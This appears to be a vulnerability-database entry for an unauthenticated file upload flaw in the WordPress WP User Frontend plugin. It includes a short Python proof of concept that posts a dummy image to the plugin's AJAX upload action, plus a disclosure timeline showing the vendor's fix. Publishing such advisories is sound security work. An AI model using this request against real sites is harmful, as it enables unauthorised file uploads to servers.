Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

WordPress User Frontend Plugin < 2.3.11 - Unrestricted Arbitrary File Upload

🗓️ 08 Feb 2016 00:00:00Reported by Panagiotis VagenasType 
zdt
 zdt🔗 0day.today👁 43 Views

WordPress User Frontend Plugin < 2.3.11 - Unrestricted Arbitrary File Upload. Exploit allows unauthorized file upload via 'wpuf_file_upload' or 'wpuf_insert_image' actions

Code
'''
* Exploit Title: WordPress WP User Frontend Plugin [Unrestricted File Upload]
* Discovery Date: 2016-02-04
* Public Disclosure: 2016-02-08
* Exploit Author: Panagiotis Vagenas
* Contact: https://twitter.com/panVagenas
* Vendor Homepage: https://wedevs.com
* Software Link: https://wordpress.org/plugins/wp-user-frontend
* Version: < 2.3.11
* Tested on: WordPress 4.4.2
* Category: WebApps, WordPress
 
 
Description
-----------
 
WordPress plugin _WP User Frontend_ suffers from an unrestricted file uploade vulnerability. An attacker can exploit the `wpuf_file_upload` or `wpuf_insert_image` actions to upload any file which pass the WordPress mime and size checks.
 
The attack does not require any privilege to be performed. The mentioned actions are available to non-privileged users also, thus allowing to anyone uploading files to the web server.
 
PoC
---
'''
  
 
#!/usr/bin/python3
 
################################################################################
# WP User Frontend unrestricted file upload exploit
#
# Author: Panagiotis Vagenas <[email protected]>
################################################################################
 
import requests
import tempfile
 
url = 'http://example.com/wp-admin/admin-ajax.php'
 
postData = {
    'action': 'wpuf_file_upload'
}
 
file = tempfile.NamedTemporaryFile(mode='a+t', suffix='.jpeg')
 
file.write('A'*32)
 
file.seek(0)
 
files = {'wpuf_file': file}
 
r = requests.post(url, data=postData, files=files)
 
file.close()
 
if r.text != 'error':
    print('Success!')
    print(r.text)
else:
    print('error')
 
exit(0)
 
'''
Timeline
--------
 
1. **2016-02-04**: Vendor notified via support forums in WordPress.org
2. **2016-02-05**: Vendor responded
3. **2016-02-05**: Issue details send to vendor
4. **2016-02-06**: Requested CVE ID
5. **2016-02-06**: Vendor implemented security checks
6. **2016-02-06**: Verified that this exploit is no longer valid
7. **2016-02-08**: Vendor released v2.3.11 which resolves this issue
'''

#  0day.today [2018-04-03]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
08 Feb 2016 00:00Current
7.1High risk
Vulners AI Score7.1
wordpressunrestricted file uploadwebappsfile upload vulnerabilityvendor notificationsecurity checkspatch released
43